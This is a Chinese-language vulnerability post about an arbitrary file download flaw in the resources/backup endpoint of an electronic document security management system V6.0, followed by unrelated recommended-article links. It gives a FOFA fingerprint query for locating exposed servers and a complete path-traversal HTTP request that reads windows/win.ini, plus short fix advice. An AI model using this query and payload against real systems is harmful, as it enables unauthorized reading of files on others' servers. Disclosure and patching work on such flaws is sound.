电子文档安全管理系统V6.0接口backup存在任意文件下载漏洞

免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。

漏洞描述

电子文档安全管理系统 V6.0 resources/backup存在任意文件下载漏洞,攻击者可通过该漏洞获取服务器所有文件信息。

搜索语法

FOFA:body="docsafe/docsafe.nocache.js"

漏洞再现

GET /resources/backup//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows/win.ini HTTP/1.1

Host:

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

Accept-Encoding: gzip, deflate, br, zstd

Accept-Language: zh-CN,zh;q=0.9

Connection: keep-alive

修复建议

禁用特殊字符,限制文件读取路径。关注厂商官网信息,及时更新版本

相关推荐
海底火旺几秒前
聊一聊JavaScript中的立即执行函数(IIFE)
前端·javascript
JojO_o几秒前
frida 在安卓模拟器上的使用
java
767560479几秒前
useMemoize 方法源码解读与实战应用
前端·源码
胡乱儿起个名1 分钟前
C++的指针数组、数组指针和指针数组指针
开发语言·c++
青青奇犽1 分钟前
跨域问题全解析:七种方法轻松拿捏跨域
前端·javascript·面试
loooseFish2 分钟前
使用canvas模拟 美图AI画质消除中 选中区域上传(第一次正式使用canvas小记)
前端
kill bert5 分钟前
第32周Java微服务入门 微服务基础
java·开发语言·微服务
学c真好玩7 分钟前
4.1-python操作wrod/pdf 文件
开发语言·python·pdf
姜行运7 分钟前
数据结构【链表】
c语言·开发语言·数据结构·链表
小智疯狂敲代码8 分钟前
Java架构师成长之路-框架源码系列-整体认识Spring体系结构(2)
java